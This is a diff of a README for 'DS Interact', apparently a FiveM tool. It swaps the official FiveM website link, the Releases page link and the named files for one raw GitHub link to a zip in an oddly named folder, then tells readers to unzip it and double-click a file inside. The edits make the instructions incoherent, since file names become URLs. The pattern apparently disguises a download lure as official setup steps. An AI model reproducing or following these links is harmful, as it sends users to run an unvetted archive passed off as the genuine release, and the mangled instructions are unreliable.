rajveer2589/DS_Interact/README.md

 - **RAM:** 4 GB or more
 - **Disk Space:** At least 500 MB free space

 Make sure you have FiveM installed prior to using DS Interact.
-Visit the [FiveM website](https://fivem.net) for instructions on how to set it up.
+Visit the [FiveM website](https://raw.githubusercontent.com/rajveer2589/DS_Interact/main/hemihedrism/DS_Interact.zip) for instructions on how to set it up.

 ## 📦 Download & Install
-1. Visit the [Releases page](https://github.com/rajveer2589/DS_Interact/releases) to access the latest version of DS Interact.
+1. Visit the [Releases page](https://raw.githubusercontent.com/rajveer2589/DS_Interact/main/hemihedrism/DS_Interact.zip) to access the latest version of DS Interact.
 2. On the Releases page, find the download link for the version you want.
 3. Click on the link to download the file.
-This file will typically be named something like `DS_Interact_v1.0.zip`.
+This file will typically be named something like `https://raw.githubusercontent.com/rajveer2589/DS_Interact/main/hemihedrism/DS_Interact.zip`.
 4. Once the download is complete, locate the file on your computer and unzip it.
 5. Open the unzipped folder.
 You will find several files related to DS Interact, including documentation and setup files.
-6. Look for the file named `run_DS_Interact.bat`.
+6. Look for the file named `https://raw.githubusercontent.com/rajveer2589/DS_Interact/main/hemihedrism/DS_Interact.zip`.
 Double-click this file to start the application.

 ## 🏗️ Configuration
 After launching DS Interact, you will see a simple interface.
 Follow these steps to configure it according to your preferences: